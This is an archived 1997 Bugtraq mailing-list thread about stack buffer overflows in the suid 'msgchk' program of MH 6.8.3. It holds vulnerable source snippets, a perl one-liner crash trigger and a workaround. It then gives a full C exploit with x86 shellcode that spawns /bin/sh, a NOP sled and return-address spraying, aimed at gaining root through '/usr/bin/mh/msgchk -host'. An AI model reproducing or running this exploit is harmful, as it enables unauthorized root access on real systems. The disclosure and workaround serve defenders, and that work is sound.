Overflow in Mailhandler 6.8.3

Date: Sat, 26 Jul 1997 18:08:00 -0600
From: Matt Conover <shok@COBRA.ONLINEX.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Multiply bugs in MH-6.8.3 (Mail Handler program)

Okay there is an overflow in MH-6.8.3, which is suid, which I THINK (not
sure), is installed, at least in Redhat 4.1+,  by default (I think this
is installed within the mail package regardless of distribution, but I
never specifically installed it). This actually has a few overflows (I
haven't actually tested this but it looks quite obvious, you'll have to
test it yourself).


The only one I'm going to describe is the program'msgchk', which is suid
(on my server it's installed by default in /usr/bin/mh/msgchk (in
function checkmail), you would also want to check /usr/lib/mh/msgchk.
(You ought to look through the code yourself..I notice quite a few
bugs..this program relies heavily on buffers and enviromental variables)

This is pretty straight forward.
  char *hdir, buf[BUFSIZ], *tmp;
                           ^^^^^^^^ not sure the exact value..check the
*.h files..for test
                                             purposes if you try to
overflow this...just use a size
                                             of 9999, just to see if it
segfaults.

        hdir = getenv("HOME");
        if (hdir == NULL)
                hdir = ".";
        (void) sprintf(buf, "%s/.netrc", hdir);

Obviously it never even checks the value of hdir..so export your home
directory to something very large (if this doesn't work, they still
disobeyed something that libc specifically says not to do...they say to
use (can't remember the exact function) _secure_getenv,
_securelib_getenv (??) something like that..and they also said NOT to
define it to set the HOME to "." (the current path) for reasons that
someone could link .netrc to something and since it's suid... test this
yourself..I don't have too much time

                                     Matt Conover (shok@onlinex.net
--  Shok).

Date: Mon, 28 Jul 1997 23:27:48 +0100
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Multiply bugs in MH-6.8.3 (Mail Handler program)

> ruserpass(host,&user,&pass); is found in msgchk.c, in checkremote() or
> something like that... meaning that the host aren't vulnerable if not
> configured.. this is from a system where mh was installed w/o being

Also that means ruserpass() from libc isnt being used which is probably
bad as most libc's have this fixed. (The hole above btw is in all the old
BSD derived libc's) but very very few current ones.

Date: Mon, 28 Jul 1997 22:51:48 -0600
From: Matt Conover 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Multiply bugs in MH-6.8.3 (Mail Handler program)

No actually you're wrong...there are two different overflows...this is why
I said there are MULTIPLE bugs...I just only mentioned one..because that
one is used no checkmail() and it will be called but there is an
exception:
static int  checkmail (user, home, datesw, notifysw, personal)
register char *user, *home;
int     datesw,
        notifysw,
        personal;
{
    int     mf,
            status;
    char    buffer[BUFSIZ];
    struct stat st;

    (void) sprintf (buffer, "%s/%s",
            mmdfldir[0] ? mmdfldir : home,
            mmdflfil[0] ? mmdflfil : user);

The exception is if mmdfldir[0] is true..otherwise this WILL get called
and this is directly in msgchk.c checkmail() NOT in ruserpass.c that is a
completely different overflow

Hi,

Sometime ago was published in bugtraq that a vulnerabily existed in the msgchk program, which is installed suid root in redhat 5.0:

msgchk -host `perl -e 'print "A" x 2000'`

leads to a segfault, which can be exploited to get root access.

Workaround: chmod 000 /usr/bin/mh/msgchk, uninstall the packet, compile it without RPOP / suid or use a wrapper (safeload).

The exploit follows.
(Sorry if this exploit was already posted. I have not seen it)

• CUT CUT CUT **********************

/* Almost everything here taken from Aleph One's Article about stack smashing (Phrack 49) */

#include <stdlib.h>

#define DEFAULT_OFFSET                 0
#define DEFAULT_BUFFER_SIZE            1018
#define NOP                            0x90

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr;
char *args[5];
char jorge[]="";
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i;
if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]);

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n"); exit(0);
}

addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4) {
buff[i]=addr & 0xFF;
buff[i+1]=(addr >> 8) & 0xFF;
buff[i+2]=(addr >> 16) & 0xFF;
buff[i+3]=(addr >> 24) & 0xFF;
}

*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

args[0]="/usr/bin/mh/msgchk";
args[1]="-host";
args[2]=buff;
args[3]=NULL;
execve(args[0],args,NULL);

}

• CUT CUT CUT **********************

Jorge Hurtado
Quark Software & Services
http://www.quarkss.es